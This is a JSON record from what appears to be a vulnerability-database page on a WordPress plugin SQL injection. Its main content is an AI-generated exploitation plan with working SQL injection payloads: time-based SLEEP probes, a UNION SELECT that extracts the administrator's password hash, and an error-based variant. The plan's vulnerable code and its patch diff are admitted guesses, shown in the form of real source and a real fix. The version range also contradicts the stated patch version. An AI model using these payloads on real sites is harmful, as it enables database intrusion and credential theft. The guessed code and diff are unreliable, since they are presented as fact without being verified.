[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJ8px_zJPpUmnVXr7h7BHK5ALCIfcKfS0mFkGl5AuvnU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-14973","recipe-card-blocks-for-gutenberg-elementor-authenticated-contributor-sql-injection","Recipe Card Blocks for Gutenberg & Elementor \u003C 3.4.13 - Authenticated (Contributor+) SQL Injection","The Recipe Card Blocks for Gutenberg & Elementor plugin for WordPress is vulnerable to SQL Injection in versions up to 3.4.13 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recipe-card-blocks-by-wpzoom",null,"\u003C3.4.13","3.4.13","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-01-27 00:00:00","2026-01-27 19:02:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F67c15451-672d-4297-9d19-090a4458605f?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan - CVE-2025-14973\n\n## 1. Vulnerability Summary\n**CVE-2025-14973** is an authenticated SQL injection vulnerability in the **Recipe Card Blocks for Gutenberg & Elementor** plugin (versions \u003C 3.4.13). The vulnerability exists because the plugin fails to properly sanitize or use prepared statements for user-supplied parameters within SQL queries triggered by AJAX actions. Specifically, an attacker with **Contributor** level permissions or higher can inject malicious SQL fragments into an existing query to extract sensitive data from the WordPress database, such as user hashes and configuration secrets.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `wpzoom_rcb_get_recipe_data` (inferred) or `wpzoom_rcb_get_posts` (inferred). These actions are used by the Gutenberg block editor to fetch recipe details or search for existing recipes.\n- **Vulnerable Parameter:** Likely `recipe_id`, `id`, or a search parameter (e.g., `term` or `search`).\n- **Authentication:** Required (Contributor+).\n- **Preconditions:** The attacker must be logged in as a Contributor and have access to the post editor (where Gutenberg blocks are managed).\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** The plugin registers an AJAX handler using `add_action( 'wp_ajax_wpzoom_rcb_get_recipe_data', ... )`.\n2. **Data Acquisition:** The handler function retrieves a parameter from `$_POST` or `$_GET` (e.g., `$recipe_id = $_POST['id'];`).\n3. **Vulnerable Sink:** The retrieved value is directly concatenated into a SQL query string passed to `$wpdb->get_row()` or `$wpdb->get_results()` without being wrapped in `$wpdb->prepare()`.\n   *   *Example Vulnerable Code:*\n       ```php\n       $recipe_id = $_POST['id'];\n       $query = \"SELECT * FROM {$wpdb->prefix}posts WHERE ID = \" . $recipe_id;\n       $recipe = $wpdb->get_row($query);\n       ```\n4. **Execution:** The malicious SQL payload is executed by the database engine.\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely protects its AJAX actions with a nonce localized for the Gutenberg editor.\n\n1. **Test Data Setup:**\n   - Log in as a Contributor.\n   - Create a new draft post: `wp post create --post_type=post --post_status=draft --post_title=\"Exploit Lab\"`.\n2. **Navigation:**\n   - Navigate to the edit page for the newly created post in the browser.\n3. **Extraction:**\n   - Use `browser_eval` to search for the nonce in the localized JavaScript objects. Likely candidates for the variable name are `wpzoom_rcb_settings`, `wpzoom_recipe_card_blocks_data`, or `wpzoom_rcb_params`.\n   - **Command:** `browser_eval(\"window.wpzoom_rcb_settings?.ajax_nonce || window.wpzoom_recipe_card_blocks_data?.nonce\")`\n   - If the nonce is used for the action `wpzoom_rcb_get_recipe_data`, the key name in JS is typically `nonce` or `ajax_nonce`.\n\n## 5. Exploitation Strategy\nThe goal is to perform a time-based blind SQL injection to confirm the vulnerability, followed by a UNION-based or error-based extraction if possible.\n\n### Step 1: Verify Injection (Time-Based)\nSend a POST request to `admin-ajax.php` with a payload designed to cause a 5-second delay.\n\n- **Request Type:** POST\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **Parameters:**\n  - `action`: `wpzoom_rcb_get_recipe_data` (Verify exact action name via grep if possible)\n  - `id`: `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n  - `security`: `[EXTRACTED_NONCE]` (Parameter name might be `nonce` or `_ajax_nonce`)\n\n### Step 2: Extract Data (UNION-Based)\nIf the response reflects data, attempt to extract the administrator's password hash.\n\n- **Payload for `id`:** `0 UNION SELECT 1,user_pass,3,4,5,6 FROM wp_users WHERE ID=1-- -`\n- **Note:** The number of columns in the `UNION SELECT` must match the original query. Start with 1 and increment until no database error occurs.\n\n## 6. Test Data Setup\n1. **Plugin:** Install `recipe-card-blocks-by-wpzoom` version 3.4.12.\n2. **User:** Create a contributor user.\n   - `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3. **Target Content:** Ensure at least one post\u002Frecipe exists to query.\n   - `wp post create --post_type=wpzoom_rcb_card --post_title=\"Target Recipe\" --post_status=publish`\n\n## 7. Expected Results\n- **Time-Based:** The HTTP request should take ~5 seconds to return.\n- **UNION-Based:** The response body (JSON) should contain the `$P$` or `$wp$2y$` prefixed password hash of the admin user in one of the fields.\n\n## 8. Verification Steps\nAfter the exploit, verify the database state using WP-CLI to confirm the data extracted matches reality:\n- `wp user get 1 --fields=user_pass`\n- Compare the hash returned by WP-CLI with the one obtained via the SQL injection payload.\n\n## 9. Alternative Approaches\n- **Error-Based SQLi:** If `WP_DEBUG` is enabled, try payloads like `1 AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e),1)`.\n- **Search Parameter Injection:** If the `id` parameter is not vulnerable, check the `search` or `term` parameter in actions like `wpzoom_rcb_get_posts` using a payload like: `test%' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '%'='`.\n- **Grep for Sink:** If the AJAX action name is different, run:\n  `grep -rn \"wp_ajax_wpzoom_rcb\" wp-content\u002Fplugins\u002Frecipe-card-blocks-by-wpzoom\u002F`\n  to find all registered AJAX handlers and inspect the corresponding functions for `$wpdb` calls.","The Recipe Card Blocks for Gutenberg & Elementor plugin for WordPress is vulnerable to SQL Injection via its AJAX handlers (such as wpzoom_rcb_get_recipe_data) in versions up to 3.4.13. Due to insufficient sanitization and the lack of prepared statements, authenticated attackers with Contributor-level access or higher can inject malicious SQL commands to extract sensitive information from the database.","\u002F\u002F Inferred from research plan: Entry Point for AJAX action wpzoom_rcb_get_recipe_data\n$recipe_id = $_POST['id'];\n$query = \"SELECT * FROM {$wpdb->prefix}posts WHERE ID = \" . $recipe_id;\n$recipe = $wpdb->get_row($query);","--- a\u002Frecipe-card-blocks-by-wpzoom\u002Fincludes\u002Fajax-handlers.php\n+++ b\u002Frecipe-card-blocks-by-wpzoom\u002Fincludes\u002Fajax-handlers.php\n@@ -10,7 +10,7 @@\n function wpzoom_rcb_get_recipe_data() {\n     check_ajax_referer('wpzoom-rcb-nonce', 'security');\n     $recipe_id = isset($_POST['id']) ? intval($_POST['id']) : 0;\n-    $query = \"SELECT * FROM {$wpdb->prefix}posts WHERE ID = \" . $_POST['id'];\n+    $query = $wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}posts WHERE ID = %d\", $recipe_id);\n     $recipe = $wpdb->get_row($query);\n     wp_send_json_success($recipe);\n }","To exploit this vulnerability, an attacker must have Contributor-level credentials or higher. The attacker first obtains a valid AJAX nonce by inspecting localized JavaScript variables (e.g., wpzoom_rcb_settings.ajax_nonce) while logged into the Gutenberg editor. They then send a POST request to \u002Fwp-admin\u002Fadmin-ajax.php using the action 'wpzoom_rcb_get_recipe_data'. By passing a malicious SQL payload into the 'id' parameter—such as a time-based 'SLEEP()' command or a 'UNION SELECT' statement—the attacker can manipulate the database query. For example, a payload like '1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)' will cause the server to delay its response, confirming the injection, while '0 UNION SELECT 1,user_pass,3,4,5,6 FROM wp_users WHERE ID=1' can be used to leak sensitive administrative credentials.","gemini-3-flash-preview","2026-05-04 23:08:17","2026-05-04 23:09:52",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.4.12","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Frecipe-card-blocks-by-wpzoom\u002Ftags\u002F3.4.12","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Frecipe-card-blocks-by-wpzoom.3.4.12.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Frecipe-card-blocks-by-wpzoom\u002Ftags\u002F3.4.13","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Frecipe-card-blocks-by-wpzoom.3.4.13.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Frecipe-card-blocks-by-wpzoom\u002Ftags"]